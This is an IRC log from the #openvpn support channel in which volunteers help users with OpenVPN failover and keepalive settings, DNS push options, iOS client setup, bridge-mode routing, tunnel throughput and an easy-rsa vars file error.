[Remote host closed the connection] 04:28 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 04:28 -!- mode/#openvpn [+o plaisthos] by ChanServ 04:33 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 04:38 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 05:00 < EugeneKay> If oyu want >1 crelationsihip, use TLS. 05:00 < EugeneKay> Static Key is extremely limited 05:10 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 245 seconds] 05:13 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 05:21 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn 05:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: leaving] 05:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Quit: Yippee-kay-yay] 06:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 06:15 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer] 06:20 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:04 -!- master_of_master [~master_of@p57B525AE.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 07:06 -!- master_of_master [~master_of@p57B5596B.dip.t-dialin.net] has joined #openvpn 07:25 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 07:38 -!- ade_b [~Ade@ip-109-46-161-95.web.vodafone.de] has joined #openvpn 07:38 -!- ade_b [~Ade@ip-109-46-161-95.web.vodafone.de] has quit [Changing host] 07:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:57 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 08:15 -!- JSharpe_ [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn 08:16 -!- JSharpe_ [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Client Quit] 08:17 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 08:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:43 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 246 seconds] 08:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 08:47 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:49 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 08:49 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:04 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 252 seconds] 09:06 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 09:11 -!- dougquaid [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn 09:16 -!- sqwerty [~sqwerty@nl1.tunnelninja.com] has joined #openvpn 09:16 -!- sqwerty [~sqwerty@nl1.tunnelninja.com] has quit [Changing host] 09:16 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 09:18 < dougquaid> I've got two openvpn servers, a primary and a backup. Each client has two remotes specified. Ideally the clients would only use the backup if the primary is totally inaccessible, but every so often one client won't be able to reconnect to the primary server on ping-restart, even though the primary server is up. What is a good combo of ping-restart keepalive, etc options to keep this from happening? 09:19 < dougquaid> The clients are all servers, so they should always be connected to the VPN 09:19 < pekster> There really isn't one that will "keep it" from happening as the Internet sometimes looses/drops/delays packets in ways you cannot predict or prevent 09:19 < dougquaid> I was afraid of that 09:20 < pekster> You could write some intelligent code to keep trying a single remote host from your client unless it has several consecutitive failures, or set up some smart logic on your server's backends that denies connections on the backup unless the primary is really down 09:20 < pekster> (maybe the backup is also a client of the primary, and if it looses a connection for more than X minutes it starts up) 09:20 < dougquaid> That's an interesting idea 09:21 < pekster> Not a great way to get clients "back" to the primary later, besides disconnecting them 09:21 < dougquaid> My thought of a quick and dirty fix was to specify the primary server 2 or 3 times in the list of remotes, then specify the backup 09:22 < pekster> I'm not sure that works how you expect, and if it did you're just postponing the condition, not preventing it 09:23 < pekster> All depends on the reason for the disconnect and how stable the link is when it comes back 09:26 < dougquaid> I'm not sure of the reason. All I see in my client logs is "UDPv4 link remote: [AF_INET]x.x.x.x:1194" followed by "[UNDEF] Inactivity timeout (--ping-restart), restarting" a minute later 09:28 < pekster> Depends on your keepalive settings, but that means that the client got no openvpn ping (not icmp ping - this one is uni-directional and stateless) for the timeout period 09:29 < pekster> !keepalive 09:29 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 09:33 < dougquaid> I haven't specified keepalive or ping in the clients. I'll try those and see if it helps. Thanks 09:34 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 09:35 < pekster> dougquaid: That can be pushed from the server. The manpage shows you the exact expansion depending on if you define it on the server or client side 09:39 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:42 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Read error: Operation timed out] 09:48 <@plaisthos> on loosing connection openvpn will first try to reconnect to the old server and if that fails move to the next one 09:59 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has joined #openvpn 09:59 -!- sqwerty [~sqwerty@cpc3-aztw22-2-0-cust516.aztw.cable.virginmedia.com] has quit [Changing host] 09:59 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 10:16 -!- dweez [dweez@unaffiliated/dweez] has joined #openvpn 10:25 -!- dweez [dweez@unaffiliated/dweez] has quit [Remote host closed the connection] 10:43 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 10:43 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 10:52 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:53 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 10:53 -!- mode/#openvpn [+v s7r] by ChanServ 11:05 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 260 seconds] 11:09 < dougquaid> When I make changes to my server config is it possible to get openvpn to read the new config without restarting the whole service and disconnecting clients? Also, can I force a push of new directives down to the clients? 11:10 < pekster> See the section titled 'SIGNALS' in the manpage: a HUP will re-read the config, but it'll disconnect clients in the process 11:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:10 < pekster> Clients get new push directives when they reconnect; you can use a --client-connect script to send options to clients dynamically, thus you can edit what's pushed without needing to HUP or restart the service 11:11 -!- nameless` [~nameless@u1c.eu] has left #openvpn [] 11:11 < dougquaid> ok, thanks 11:14 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 260 seconds] 11:15 -!- MorgyN [~mig@178.63.57.253] has quit [Ping timeout: 245 seconds] 11:16 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 11:17 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 11:21 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Remote host closed the connection] 11:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Read error: Connection reset by peer] 11:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:27 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 11:31 -!- MeanderingCode [~Meanderin@71-213-161-193.albq.qwest.net] has joined #openvpn 11:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:35 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds] 11:41 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has quit [Ping timeout: 276 seconds] 11:42 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 11:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:58 -!- AsadH is now known as zz_AsadH 12:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds] 12:09 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:13 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn 12:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 252 seconds] 12:17 -!- failshell [~failshell@lpr157.lapresse.ca] has joined #openvpn 12:18 < failshell> hello. openvpn is sending my client one domain name for searches as domain example.com in /etc/resolv.conf 12:18 < failshell> i would like to push the option search example.com sub.example.com to /etc/resolv.conf 12:18 < failshell> how do i do that? 12:18 < failshell> cant find in the doc 12:20 <@dazo> failshell: iirc ... only one search domain can be pushed ... not even sure the DHCP protocol supports multiple search domains 12:20 < pekster> resolv.conf claims to be "limited to six domains with a total of 256 characters" 12:21 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 252 seconds] 12:21 < failshell> dazo: it does, its a standard DHCP option 12:21 < failshell> actually, i think i found 12:21 < pekster> Pushing multiple options might work, although I'm not sure if the stock Unix-like scripts to peak at that info as pushed from openvpn support it out of the box 12:25 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 12:34 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 12:34 -!- mode/#openvpn [+v s7r] by ChanServ 12:34 < failshell> turns out i can do it at the client level 12:34 < failshell> easier 12:34 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 12:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:36 -!- failshell [~failshell@lpr157.lapresse.ca] has quit [Remote host closed the connection] 12:38 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 12:46 -!- MeanderingCode [~Meanderin@71-213-161-193.albq.qwest.net] has quit [Remote host closed the connection] 12:52 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 256 seconds] 12:53 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Read error: Operation timed out] 13:13 -!- AlxRogan [~alxrogan@procfail.net] has joined #openvpn 13:14 < AlxRogan> !welcome 13:14 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 13:14 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 13:14 < AlxRogan> !goal 13:14 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 13:16 < AlxRogan> I would like to access the internet over my VPN. I'm running openvpn from ubuntu repo, 2.2.1 with iphone 5 running ios 6.1.2. Trying to use the iphone configuration utility so that I can enable Connect on Demand, but I'm getting certificate errors, which I believe are regarding my ca cert 13:16 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 13:17 < EugeneKay> Try getting things set up with a laptop first to make sure the server is configured correctly, then port the configuration onto your phone 13:18 < AlxRogan> EugeneKay: definitely an option, I was just hoping someone had run into this specific issue regarding the X509 error before using IPCU. I've seen lots of people using a modified ovpn file with the ca embedded in the file, but that won't work for the IPCU 13:18 < AlxRogan> thanks though 13:18 < EugeneKay> Without logs I have no idea what the specific issue is :-p 13:19 < EugeneKay> "Real" computers are much easier to log/debug, which is why I suggest starting there 13:19 < AlxRogan> what's the best way for me to display them, just paste into channel or something like pastebin? 13:19 < EugeneKay> !paste 13:19 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 13:20 < AlxRogan> agreed, I definitely am trying the hardest option first...going to step back and go with the itunes method first, if that doesn't do it, then I'll fall back to laptop 13:20 < AlxRogan> http://pastebin.com/9DTW9zY8 13:20 -!- jamesbond-4711 [~jamesbond@unaffiliated/jamesbond-4711] has joined #openvpn 13:20 -!- dazo is now known as dazo_afk 13:20 < AlxRogan> are the logs from device, no server logs as it never tries to connect 13:21 < EugeneKay> Yeah, you didn't laod the cert right 13:21 < EugeneKay> I don't own any Apple products, so I can't give much in the way of advice for the format that this client is expecting 13:22 < AlxRogan> EugeneKay: gotcha...it seems to be a disconnect between what apple's keychain is allowing and the polarssl library is expecting 13:22 < AlxRogan> and it's very possible it just won't work that way for now 13:23 < AlxRogan> I appreciate the responses though :) 13:25 < jamesbond-4711> hi 13:27 < jamesbond-4711> I need some advice how to start: I'm considering installing an openVPN server on debian which I would like to use with an iphone as the client (openVPN connect app). Is this the right howto I should follow to set up the server: http://wiki.openvpn.eu/index.php/Config_ServerNET_Routing ? 13:27 <@vpnHelper> Title: Config ServerNET Routing – OpenVPN Wiki (at wiki.openvpn.eu) 13:29 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 13:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:34 < pekster> jamesbond-4711, you probably want the official howto: 13:34 < pekster> !howto 13:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:34 < AlxRogan> EugeneKay: just FYI, got it working using the iTunes method, now just tweaking the server side stuff for proxy settings/etc 13:35 -!- vraa__ [~speed_rac@h85.188.213.151.dynamic.ip.windstream.net] has joined #openvpn 13:36 < jamesbond-4711> pekster: wow, that's a lot to read and will keep me busy for some time :-) 13:36 < jamesbond-4711> pekster: anything in particular I should be aware of when I want to use the iphone as the client? 13:37 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 13:38 -!- vraa__ [~speed_rac@h85.188.213.151.dynamic.ip.windstream.net] has quit [Client Quit] 13:39 < pekster> I don't have an iDevice so I can't say; your best bet is to get it working on a PC first as a client, then import that config into the iDevice 13:40 < pekster> The integrated setup on the phone makes it hard/impossible to get accurate logs/configs to debug when things go wrong 13:43 < AlxRogan> jamesbond-4711: this helped me out a lot. http://ifkbct.blogspot.com/2013/02/finally-they-did-it-openvpn-on-ipad-and.html 13:43 <@vpnHelper> Title: If Keyboards Could Talk: Finally they did it ! openVPN on iPad and iPhone (at ifkbct.blogspot.com) 13:43 < jamesbond-4711> ic, then I should probably get it working with a linux client 13:45 < jamesbond-4711> AlxRogan: thx - with Google I found dozens of instructions how to setup Apple clients. But what I am looking for is a tutorial that describes how to setup an openVPN server especially for ios devices as clients (found none so far). 13:46 < AlxRogan> jamesbond-4711: I loosely followed this guide for the server side. http://library.linode.com/networking/openvpn/ubuntu-10.04-lucid#sph_tunnel-all-connections-through-the-vpn 13:46 <@vpnHelper> Title: Secure Communications with OpenVPN on Ubuntu 10.04 (Lucid) – Linode Library (at library.linode.com) 13:47 < jamesbond-4711> AlxRogan: thank you! :-) 13:48 < AlxRogan> jamesbond-4711: np...good luck! 13:53 < pekster> You don't really need to do anything "different" to support an iOS vs Windows vs Linux, besides the obvious "get the config to the device" step 13:53 < pekster> openvpn is platform-neutral as a protocol 13:55 < jamesbond-4711> pekster: good to know. As far as I know ios devices, I thought that using ios as the client implies some restrictions on the server setup... 13:56 < pekster> I know android doens't support tap (at least on non-rooted devices) but I don't really know about iOS 13:56 < pekster> Unless you're doing exotic things you should be fine 13:56 < jamesbond-4711> cool 13:57 < pekster> !iphone 13:57 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store or (#3) https://community.openvpn.net/openvpn/wiki/IOSinline 13:57 < pekster> That link might only apply to iOS 4, so check that key readability thing 13:59 < jamesbond-4711> I guess that should be fixes after 3 years now :) 14:03 < pekster> Well, not until iOS 5 14:03 < pekster> I think 14:03 < pekster> Yay closed-source! 14:10 -!- funjon [jdisher@asano.parad.net] has joined #openvpn 14:10 -!- funjon [jdisher@asano.parad.net] has left #openvpn [] 14:12 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 14:19 <@ecrist> pekster: it's not closed source by choice 14:22 < pekster> The security flaw was in iOS, not openvpn. And yes, I understand the openvpn+iOS app deal 14:31 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:33 -!- zz_AsadH is now known as AsadH 14:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 246 seconds] 14:41 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:46 -!- AlxRogan [~alxrogan@procfail.net] has quit [Quit: leaving] 14:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 14:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:57 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 15:01 -!- MarKsaitis_ [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:02 -!- MarKsaitis_ [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 15:02 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:08 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 15:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds] 15:12 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 15:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:12 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:37 -!- mode/#openvpn [+o krzee] by ChanServ 15:39 -!- AsadH is now known as zz_AsadH 15:48 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 15:54 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:54 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:12 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds] 16:14 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 16:29 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:29 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 16:35 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 16:44 < neilhwatson> I have a problem with my bridge mode VPN. All previous checks with folks on this channel indicate that the tunnel is connected. The tunnel routes properly via my ISP to maintain itself. The tunnel is supposed to become the default route. I think that this may be where the problem lies. Once the tunnel is connect no traffic is route out, on any interface. A tcpdump on interface 'any' shows no traffic when 16:44 < neilhwatson> https://gist.github.com/neilhwatson/5025038 16:44 <@vpnHelper> Title: openvpn configs (at gist.github.com) 16:46 < pekster> Your message got cut off after "shows no traffic when" 16:46 < pekster> (missing splitlong.pl if you're an irssi user) 16:47 < neilhwatson> Once the tunnel is connect no traffic is route out, on any interface. A tcpdump on interface 'any' shows no traffic when I ping 8.8.8.8. 16:47 < pekster> What is that routing output from? the client? 16:48 < neilhwatson> Yes 16:48 < pekster> Why are you using a bridge on the client? What's the network setup 16:48 < pekster> And where is tap0 in all of this? Is that actually bridged to something? 16:49 < neilhwatson> tap0 is attached to br0 16:49 < pekster> huh? 16:49 < pekster> No, don't do that 16:50 < pekster> Also, you're somehow missing the host-route (/32) to the VPN server's IP via your default gateway 16:50 < pekster> Unless you've mistakenly replaced it with over-zealous hiding of your IPs on line 16 16:50 < pekster> (which is why this kind of replacement is bad and makes life really hard if you want help and don't know what you're doing when you hide IPs) 16:51 < pekster> tap0 is a virtual address. It does *not* belong on a bridge on the client-side like that 16:53 < neilhwatson> My mistake. I will change tap0 16:54 < pekster> You don't need any client bridge unless you're actually bridging them. Chances are you can just undo all the br0/br1 stuff and go back to direct eth0/eth1/watever connections 16:55 < pekster> Only the server needs tap0 & the physical iface on a bridge in a bridged setup 17:00 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Quit: ZNC - http://znc.sourceforge.net] 17:00 -!- p3rror [~mezgani@41.249.25.162] has joined #openvpn 17:04 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 17:05 -!- marksaitis [~marksaiti@86.28.107.165] has joined #openvpn 17:06 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Read error: Operation timed out] 17:07 -!- marksaitis [~marksaiti@86.28.107.165] has quit [Remote host closed the connection] 17:07 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Ping timeout: 256 seconds] 17:08 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 17:08 -!- mode/#openvpn [+o plaisthos] by ChanServ 17:14 -!- jamesbond-4711 [~jamesbond@unaffiliated/jamesbond-4711] has left #openvpn ["Leaving"] 17:19 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 17:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 246 seconds] 17:25 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 17:29 < neilhwatson> Thanks pekster. You've been very patient with me. Routing is working now. 17:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:43 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving] 17:46 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds] 18:09 -!- [fred] [~fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 18:09 < neilhwatson> Is anyone using Openvpn through Roger in Canada? If so, is your tunnel much slower that your pipe? Do you suspect throttling on the part of Rogers? 18:19 -!- [fred] [fred@konfuzi.us] has joined #openvpn 18:20 <@krzee> im not on rogers or in canada, but i have experienced slow-down when tunneling before, its rather normal 18:20 <@krzee> it's part of redirecting your connection over the vpn before it goes to the internet exposed 18:21 <@krzee> that doesnt mean they are not throttling, i have no way to know that… but it may just be normal 18:21 < neilhwatson> From 40Mbps to 5Mbps seems a bit much. 18:21 <@krzee> you tunneling to a server that you can get 40mbps to normally? 18:21 <@krzee> (without openvpn) 18:21 < neilhwatson> 100Mbps 18:21 <@krzee> that wasnt the question 18:22 <@krzee> i didnt ask what connection its on, im asking about your real life xfer speed to the server 18:22 < neilhwatson> Fair poing 18:23 <+hazardous> hi krzee 18:23 <@krzee> hi 18:23 <+hazardous> neilhwatson: are you on a 'real' connection or a residential connection? afaik anything encrypted is throttled in some way as an anti torrent defence mechanism 18:23 <+hazardous> at least that goes for bell and bell subsidiaries 18:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 18:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:27 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 18:27 < neilhwatson> Residential. No one at rogers would confirm or deny throttling on a business subscription which made the premium price off putting. 18:35 < neilhwatson> confirmed 40Mbps between client and vpn server outside of tunnel :( 18:36 < pekster> Can you repeat that test going directly to the VPN endpoint, not an external host beyond that? 18:36 < pekster> ie: if you did that by doing an scp of a 50M file, to the server, for instance, do that again to the VPN IP going across the tunnel 18:37 <@krzee> exactly ^ 18:37 < pekster> It's wise to make it a sufficiently large file too to overcome any initial "burst" upload you get 18:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 18:47 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 18:53 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 18:58 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 19:09 -!- raidz is now known as raidz_away 19:17 -!- bluethundr [~dunphy@ool-4573b723.dyn.optonline.net] has joined #openvpn 19:18 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 19:19 < bluethundr> hello.. I am trying to install openvpn on centos and when I go to source ./vars it seems that all of the variables in my openssl-1.0.0.cnf file are being treated as commands by the operating system and therefor failing... 19:19 < bluethundr> http://paste.jokefire.com/index.php/view/99801869 19:19 < bluethundr> I was just wondering what I was doing wrong here 19:19 < bluethundr> tx 19:21 < pekster> Possibly a mistake in your vars file when you edited the env-var export lines 19:21 < pekster> Can you paste the vars file you're using? 19:22 < pekster> Or an error with the whichopensslcnf code, possibly 19:23 < bluethundr> yeah I can post the vars file tx 19:23 < pekster> (you could try adding a debugging 'echo' command before and after that line to see if that's where the spray of errors occurs 19:23 < pekster> Those are my 2 guesses 19:23 < pekster> Yea, let's see the vars file, then I'll see if that makes sense next 19:28 < bluethundr> here's the conf file sorry for the delay 19:28 < bluethundr> http://paste.jokefire.com/index.php/view/22005598 19:28 < pekster> The vars file was what I was interested in 19:29 < pekster> the cnf is just the openssl config and doesn't get source (or, shouldn't be as it apparently is in your case) 19:29 < bluethundr> oh sorry yeh just realized 19:29 < bluethundr> one sec I'll grab that 19:30 < bluethundr> I didn't edit this file .. perhaps i should 19:30 < bluethundr> http://paste.jokefire.com/index.php/view/66305933 19:31 < bluethundr> also thanks for the clarification 19:31 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 19:32 <@krzee> export GREP="grep" 19:32 <@krzee> heh 19:33 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Read error: Operation timed out] 19:34 < bluethundr> heh... nice 19:34 < pekster> bluethundr: Ah, you've incorrectly edited line 29 19:34 < bluethundr> oh thanks for the tip 19:34 < pekster> You either need to double-quote it, or leave it as the stock line which is as follows: 19:35 < pekster> # easy-rsa parameter settings 19:35 < pekster> # NOTE: If you installed from an RPM, 19:35 < pekster> # don't edit this file in place in 19:35 < pekster> # /usr/share/openvpn/easy-rsa -- 19:35 < pekster> # instead, you should copy the whole 19:35 < pekster> # easy-rsa directory to another location 19:35 < pekster> # (such as /etc/openvpn) so that your 19:35 < pekster> # edits will not be wiped out by a future 19:35 < pekster> # OpenVPN package upgrade. 19:35 < pekster> # This variable should point to 19:35 < pekster> # the top level of the easy-rsa 19:35 < pekster> # tree. 19:35 < pekster> export EASY_RSA="`pwd`" 19:35 < pekster> # 19:35 < pekster> # This variable should point to 19:35 < pekster> # the requested executables 19:35 < pekster> # 19:35 < pekster> export OPENSSL="openssl" 19:35 < pekster> export PKCS11TOOL="pkcs11-tool" 19:35 < pekster> export GREP="grep" 19:35 -!- mode/#openvpn [+q pekster!*@*] by krzee 19:35 <@krzee> we'll let the flood go by real quick 19:35 <@krzee> :D 19:36 < bluethundr> hehe 19:36 <@krzee> mis-fire, i know 19:36 -!- mode/#openvpn [-q pekster!*@*] by krzee 19:36 < pekster> # it correctly! 19:36 -!- pekster [~rewt@openvpn/community/support/pekster] has left #openvpn [":("] 19:36 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 19:36 <@krzee> =] 19:36 * pekster sighs 19:36 <@krzee> the bot doesnt floodkick you either 19:36 < pekster> Apparently I botched my gpm+visual mode in vim 19:36 <@krzee> cause you're speshul 19:37 < pekster> So, bluethundr what, you want is to either double-quote that file to use it specifically, or put line 29 back to the stock config which is this: 19:37 < pekster> export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA` 19:38 < pekster> krzee: Yea, I did what should have been a terminal select, and apparently vim+gpm took over and did a "visual" select (which doesn't get put in the local clipboard.) That left my clipboard full of the paste content I put into my editor. Bleh. 19:38 < pekster> I should probably find an irssi plugin that double-checks on >3 lines of paste or somethin 19:39 <@krzee> meh it happens 19:39 < pekster> Besides that, I really like my new .vimrc file :P 19:39 <@krzee> better here than some channel you dont frequent giving help in =] 19:40 < bluethundr> will do thanks 19:41 <@krzee> bourne shell is so much more tedious than bash 19:41 < bluethundr> pekster: cool thanks for the advice 